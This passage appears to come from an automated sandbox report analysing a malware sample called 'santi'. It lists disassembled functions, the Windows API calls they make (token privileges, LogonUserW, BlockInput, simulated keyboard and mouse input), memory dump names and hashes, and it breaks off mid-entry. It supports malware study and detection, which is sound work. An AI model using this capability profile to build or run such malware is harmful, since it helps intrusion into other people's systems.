                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: CloseControlCreateDeviceFileHandle
                                                                • String ID:
                                                                • API String ID: 33631002-0
                                                                • Opcode ID: dce8f16770569cbe6e67019d29934e7dbba0190b7745bff3294848b9d9cbae93
                                                                • Instruction ID: c00fd817523c1a31cc0e36c8e8ccdfac58f8e7509786a350e3f7d900e0663f12
                                                                • Opcode Fuzzy Hash: dce8f16770569cbe6e67019d29934e7dbba0190b7745bff3294848b9d9cbae93
                                                                • Instruction Fuzzy Hash: 4B111E71E01228BFDB118FA5EC45BAEBBBCEB49B10F108156F900E6290D7B05A058BA5
                                                                Function 003271FA Relevance: 4.5, APIs: 3, Instructions: 42memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00327223
                                                                • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0032723A
                                                                • FreeSid.ADVAPI32(?), ref: 0032724A
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                • String ID:
                                                                • API String ID: 3429775523-0
                                                                • Opcode ID: ac5b700389cd325031f881bc00e0676867aee7bc9a5c2269c06f06c405d0b5b6
                                                                • Instruction ID: d477e7c852ad5ad51cf5d32a519f1f5a20889d80138e4bf8e59fc137630a5564
                                                                • Opcode Fuzzy Hash: ac5b700389cd325031f881bc00e0676867aee7bc9a5c2269c06f06c405d0b5b6
                                                                • Instruction Fuzzy Hash: 5CF0FF75E04209BBDF05DBE4DD99AADBBBCEB08301F108469E502E2191E27056548B10
                                                                Function 0032F56F Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • FindFirstFileW.KERNEL32(?,?), ref: 0032F599
                                                                • FindClose.KERNEL32(00000000), ref: 0032F5C9
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Find$CloseFileFirst
                                                                • String ID:
                                                                • API String ID: 2295610775-0
                                                                • Opcode ID: 320ba48330d4fc5ca84c50567f09759cdbc03359ff3e8e9ffbb085905bac0879
                                                                • Instruction ID: 24c7e2053198d673084388166fd95d76d508fa371216dcfebac96b37dfa399c6
                                                                • Opcode Fuzzy Hash: 320ba48330d4fc5ca84c50567f09759cdbc03359ff3e8e9ffbb085905bac0879
                                                                • Instruction Fuzzy Hash: CB11C4316106049FD711EF29D845A2EF3E8FF85324F01892EF9A5DB291CB70AD048F81
                                                                Function 0032CE7A Relevance: 3.0, APIs: 2, Instructions: 30windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0033BE6A,?,?,00000000,?), ref: 0032CEA7
                                                                • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0033BE6A,?,?,00000000,?), ref: 0032CEB9
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: ErrorFormatLastMessage
                                                                • String ID:
                                                                • API String ID: 3479602957-0
                                                                • Opcode ID: 59da5e3612dc22ab3f9cd7677bcbbf148f4906d1a0bdbedef02fedc34bbe5707
                                                                • Instruction ID: 2eb99675e03ba6046cd5bc95fa8e4e0766fcbbe5377400577ecca6fd3fffdf78
                                                                • Opcode Fuzzy Hash: 59da5e3612dc22ab3f9cd7677bcbbf148f4906d1a0bdbedef02fedc34bbe5707
                                                                • Instruction Fuzzy Hash: AAF0EC31510229ABEB21ABA0DC48FEA376CBF083A1F008125F809D6180C7709A00CBA0
                                                                Function 0032411C Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00324153
                                                                • keybd_event.USER32(?,75A4C0D0,?,00000000), ref: 00324166
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: InputSendkeybd_event
                                                                • String ID:
                                                                • API String ID: 3536248340-0
                                                                • Opcode ID: 26227e0425cfa7273cd826ca965d53a124fd952375cc12c25ed37d23caff65ab
                                                                • Instruction ID: 4124f02ea771b58605bd050fc23259bf6b28376cb998de56ae1547765122a255
                                                                • Opcode Fuzzy Hash: 26227e0425cfa7273cd826ca965d53a124fd952375cc12c25ed37d23caff65ab
                                                                • Instruction Fuzzy Hash: F6F09A7090034DAFDB068FA0C805BBE7FB4EF04305F00800AF966A6292D7B9D612DFA4
                                                                Function 0031AB84 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0031ACC0), ref: 0031AB99
                                                                • CloseHandle.KERNEL32(?,?,0031ACC0), ref: 0031ABAB
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: AdjustCloseHandlePrivilegesToken
                                                                • String ID:
                                                                • API String ID: 81990902-0
                                                                • Opcode ID: a51c78d088ef7c7f3a5b19959e00afaec0a6d0b3fa45811edfff0256ddf3e491
                                                                • Instruction ID: 00f49b6e437206f135af7633c4827924e152b8aed9c018dc3b69f2920f9b091c
                                                                • Opcode Fuzzy Hash: a51c78d088ef7c7f3a5b19959e00afaec0a6d0b3fa45811edfff0256ddf3e491
                                                                • Instruction Fuzzy Hash: 47E08631010510AFE7262F14FD04D73BBEDEF04320B20C439F59980430C7625C90DB50
                                                                Function 003081AC Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,00306DB3,-0000031A,?,?,00000001), ref: 003081B1
                                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 003081BA
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: ExceptionFilterUnhandled
                                                                • String ID:
                                                                • API String ID: 3192549508-0
                                                                • Opcode ID: 134dc357765134bbf3bec0b1153a95321c7ebb38cd67155a028278e457abf610
                                                                • Instruction ID: b28b669f1f7b493b0faed03e4c7c7668ec58ec34c35704d24bb54d391bc3008c
                                                                • Opcode Fuzzy Hash: 134dc357765134bbf3bec0b1153a95321c7ebb38cd67155a028278e457abf610
                                                                • Instruction Fuzzy Hash: 8AB09235644608ABDB022BA2EC0DB587F6CEB08752F208010F60D442618BB254108A96
                                                                Function 002F3200 Relevance: 2.2, Strings: 1, Instructions: 986COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: BuffCharUpper
                                                                • String ID: :
                                                                • API String ID: 3964851224-3082381708
                                                                • Opcode ID: b82720118f9054180419fd545fd55d233b3ca87217df56d999c579fb0f3c54bc
                                                                • Instruction ID: 090273104be44c29179cde690f2849b13eb3430375f1438fff9629696cdf0796
                                                                • Opcode Fuzzy Hash: b82720118f9054180419fd545fd55d233b3ca87217df56d999c579fb0f3c54bc
                                                                • Instruction Fuzzy Hash: F9928970618245CFD725DF18C490B2AF7E1BF88348F14886DEA8A8B362D771ED59CB52
                                                                Function 0030D1B9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3119fac6e3d36050bd973b41eae5f6da3500c64aec8315ebedb40a8d0736b759
                                                                • Instruction ID: 30074809298ea5c7c08244f70dde04675fac6b744b4d43e183087551fa9ff18b
                                                                • Opcode Fuzzy Hash: 3119fac6e3d36050bd973b41eae5f6da3500c64aec8315ebedb40a8d0736b759
                                                                • Instruction Fuzzy Hash: BE32E022D2AF414DD7279634D932326A28CEFB73D5F15D727E819B5EAAEB29C4C34100
                                                                Function 002E96C0 Relevance: 2.1, APIs: 1, Instructions: 573COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: __itow__swprintf
                                                                • String ID:
                                                                • API String ID: 674341424-0
                                                                • Opcode ID: e4c1d50e02fa82779b0097288b386885a1e200cf68763ffff2a475ec1cc1cf48
                                                                • Instruction ID: 4d3c4d9ad4dbc657d9ee0a35801d3374ed9bde97fb7013c5cff4f3c3df2de559
                                                                • Opcode Fuzzy Hash: e4c1d50e02fa82779b0097288b386885a1e200cf68763ffff2a475ec1cc1cf48
                                                                • Instruction Fuzzy Hash: A422DB715683419FC725DF15C880B6FB7E4AF84304F50492EF99A8B2A1DB71E998CF82
                                                                Function 0031038E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a01980bdc38334666b32b67a4a7ea3679454af01986563cbab9491de9bd49798
                                                                • Instruction ID: 41cc76eea6655ba778c0995e17743d9ef35f8b9e6842ba6310b1354a5c25f79e
                                                                • Opcode Fuzzy Hash: a01980bdc38334666b32b67a4a7ea3679454af01986563cbab9491de9bd49798
                                                                • Instruction Fuzzy Hash: D7B1CD20D2AF414DD22796398871336B69CAFBB3D5F92D71BFC2A74D62EB6185C34180
                                                                Function 0032B6CC Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __time64.LIBCMT ref: 0032B6DF
                                                                  • Part of subcall function 0030344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0032BDC3,00000000,?,?,?,?,0032BF70,00000000,?), ref: 00303453
                                                                  • Part of subcall function 0030344A: __aulldiv.LIBCMT ref: 00303473
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Time$FileSystem__aulldiv__time64
                                                                • String ID:
                                                                • API String ID: 2893107130-0
                                                                • Opcode ID: 5ece6bec82cef1dac53050d775f5f8293ed478375c5ddae7a1397ef45336b8a2
                                                                • Instruction ID: 0ff3ce38e0a022df3ade6dbfd5db40fc654592fd91b137fbbbbe56506ae30618
                                                                • Opcode Fuzzy Hash: 5ece6bec82cef1dac53050d775f5f8293ed478375c5ddae7a1397ef45336b8a2
                                                                • Instruction Fuzzy Hash: D4217F766345108BCB2ACF28D891A92F7E5EB95310B248E6DE4E5CF2C0CB74BA05DB54
                                                                Function 00336AAF Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • BlockInput.USER32(00000001), ref: 00336ACA
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: BlockInput
                                                                • String ID:
                                                                • API String ID: 3456056419-0
                                                                • Opcode ID: 7d4b209833f4e3545a1c05b06f28245902dd02169699c223b632f4c8a57ba7bb
                                                                • Instruction ID: 37d009adf9c7f4ca43fd0d658e57ed773ba074d8adddbc918213f4461bc2680d
                                                                • Opcode Fuzzy Hash: 7d4b209833f4e3545a1c05b06f28245902dd02169699c223b632f4c8a57ba7bb
                                                                • Instruction Fuzzy Hash: 37E01A76250204AFC700EBA9D84599AB7ECAFA9751F05C426EA45D7291DAB0E8048BA0
                                                                Function 003274BB Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 003274DE
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: mouse_event
                                                                • String ID:
                                                                • API String ID: 2434400541-0
                                                                • Opcode ID: 9d15817618ebf44589c5597a3d82c2a8764b4b7d010ea4add366baac27beffa9
                                                                • Instruction ID: 80108932f48961f4c15d47ff78028379b8f02091a31fd544c93a71cf8bcfba5d
                                                                • Opcode Fuzzy Hash: 9d15817618ebf44589c5597a3d82c2a8764b4b7d010ea4add366baac27beffa9
                                                                • Instruction Fuzzy Hash: 2CD05EB062C32538EC2F2726BC0FF76090CF3007C0FC28189B582C98C1B8C068019032
                                                                Function 0031B106 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,0031AD3E), ref: 0031B124
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: LogonUser
                                                                • String ID:
                                                                • API String ID: 1244722697-0
                                                                • Opcode ID: 02a18d3d04d5a237b0900f40138d3036c869aea397f71436fe96319bb8fbf859
                                                                • Instruction ID: 4b559e7d9da7bc72cb8b68d2f64d67319fa2c814c1bb5d4a49917cb2638729b1
                                                                • Opcode Fuzzy Hash: 02a18d3d04d5a237b0900f40138d3036c869aea397f71436fe96319bb8fbf859
                                                                • Instruction Fuzzy Hash: 93D09E321A464EAEDF025FA4DC06EAE3F6AEB04701F448511FA15D50A1C675D531AB50
                                                                Function 0035B340 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: NameUser
                                                                • String ID:
                                                                • API String ID: 2645101109-0
                                                                • Opcode ID: eaee927f5e46c5043e7763f8d88c32a43e62ee080eba6e2630574e68e76a0ce5
                                                                • Instruction ID: 4c73906108749e76fba66f0a6ffb4048ed8093dc98a8ef0c8f5bd188c3b4c490
                                                                • Opcode Fuzzy Hash: eaee927f5e46c5043e7763f8d88c32a43e62ee080eba6e2630574e68e76a0ce5
                                                                • Instruction Fuzzy Hash: F9C04CB1800509DFC752CBC0CD44DEEB7BCAB04701F104191D105F1110D7709B459B72
                                                                Function 00308189 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0030818F
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: ExceptionFilterUnhandled
                                                                • String ID:
                                                                • API String ID: 3192549508-0
                                                                • Opcode ID: 616311dc7f1cdb2ad8925979daf333e1ae52b82b7e5448255b79305c06a21f61
                                                                • Instruction ID: 4a21335621fbc4527232c2b8209542e6e73d52c1ebf0394acdec2f633fa1763a
                                                                • Opcode Fuzzy Hash: 616311dc7f1cdb2ad8925979daf333e1ae52b82b7e5448255b79305c06a21f61
                                                                • Instruction Fuzzy Hash: 0BA0113000020CAB8F022B82EC088883F2CEA002A0B208020F80C002208BA2A8208A82
                                                                Function 002EE3B0 Relevance: .5, Instructions: 540COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ca9c7e69ff5b502c698a547219600804c0c9160bf25c1e588586f51e2ab10e79
                                                                • Instruction ID: 84824e28f288e970bc246853737573d43f1e92bfe1ac228ef9f46a2882cff2ba
                                                                • Opcode Fuzzy Hash: ca9c7e69ff5b502c698a547219600804c0c9160bf25c1e588586f51e2ab10e79
                                                                • Instruction Fuzzy Hash: 4C22DE7096024ACFCF24DF59C480ABEF7B0FF18304F968069E94A9B351E371A995CB91
                                                                Function 002E93F0 Relevance: .5, Instructions: 531COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 01d40df523f31e646244aefc77855cac8a9c42153abb869100928d70a3bae8cb
                                                                • Instruction ID: f8dae59b56e85be1708fb575ffb63c0589efcf599f08985e6614a307640daf32
